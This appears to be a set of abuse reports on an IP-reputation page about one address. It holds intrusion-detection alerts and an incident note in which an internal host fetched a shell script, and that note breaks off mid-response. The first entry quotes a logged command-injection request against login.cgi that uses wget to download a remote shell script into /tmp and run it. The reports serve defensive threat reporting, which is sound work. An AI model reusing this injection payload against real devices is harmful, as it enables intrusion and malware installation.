"GET /login.cgi?cli=aa%20aa%27;wget%20http://34.91.168.191/sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ ...
show more"GET /login.cgi?cli=aa%20aa%27;wget%20http://34.91.168.191/sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1"
show less
06/04/2025-19:12:11.963792 34.91.168.191 Protocol: 6 ET HUNTING Observed Interesting Content-Type In ...
show more06/04/2025-19:12:11.963792 34.91.168.191 Protocol: 6 ET HUNTING Observed Interesting Content-Type Inbound (application/x-sh)
show less
06/04/2025-11:32:21.200224 34.91.168.191 Protocol: 6 ET HUNTING Observed Interesting Content-Type In ...
show more06/04/2025-11:32:21.200224 34.91.168.191 Protocol: 6 ET HUNTING Observed Interesting Content-Type Inbound (application/x-sh)
show less
06/04/2025-06:32:10.749692 34.91.168.191 Protocol: 6 ET HUNTING Observed Interesting Content-Type In ...
show more06/04/2025-06:32:10.749692 34.91.168.191 Protocol: 6 ET HUNTING Observed Interesting Content-Type Inbound (application/x-sh)
show less
06/04/2025-01:59:40.541442 34.91.168.191 Protocol: 6 ET HUNTING Observed Interesting Content-Type In ...
show more06/04/2025-01:59:40.541442 34.91.168.191 Protocol: 6 ET HUNTING Observed Interesting Content-Type Inbound (application/x-sh)
show less
06/03/2025-19:34:12.497683 34.91.168.191 Protocol: 6 ET HUNTING Observed Interesting Content-Type In ...
show more06/03/2025-19:34:12.497683 34.91.168.191 Protocol: 6 ET HUNTING Observed Interesting Content-Type Inbound (application/x-sh)
show less
06/03/2025-16:03:42.958463 34.91.168.191 Protocol: 6 ET HUNTING Observed Interesting Content-Type In ...
show more06/03/2025-16:03:42.958463 34.91.168.191 Protocol: 6 ET HUNTING Observed Interesting Content-Type Inbound (application/x-sh)
show less
06/03/2025-12:44:23.458693 34.91.168.191 Protocol: 6 ET HUNTING Observed Interesting Content-Type In ...
show more06/03/2025-12:44:23.458693 34.91.168.191 Protocol: 6 ET HUNTING Observed Interesting Content-Type Inbound (application/x-sh)
show less
06/03/2025-10:30:20.846357 34.91.168.191 Protocol: 6 ET HUNTING Observed Interesting Content-Type In ...
show more06/03/2025-10:30:20.846357 34.91.168.191 Protocol: 6 ET HUNTING Observed Interesting Content-Type Inbound (application/x-sh)
show less
Timestamp (UTC): 2025-06-02T21:24:27.241Z
Source Port (on reported IP): 80 (HTTP)
Destination IP ( ...
show moreTimestamp (UTC): 2025-06-02T21:24:27.241Z
Source Port (on reported IP): 80 (HTTP)
Destination IP (Our network): 172.16.20.10
Destination Port (Our network): 34812
Description:
Observed HTTP GET request from our internal host 172.16.20.10 to 34.91.168.191.
The IP address 34.91.168.191 responded by sending a 'text/plain' file of 368 bytes to our host.
The investigation into the file's content and purpose is ongoing.
GET /lawl.sh HTTP/1.1
Host: 34.91.168.191
User-Agent: curl/7.73.0
Accept-Encoding: gzip, deflate
Accept: /
Connection: keep-alive
HTTP/1.1 200 OK
Date: Mon, 02 Jun 2025 21:24:27 GMT
Server: Apache/2.4.62 (CentOS Stream)
Last-Modified: Mon, 02 Jun 2
show less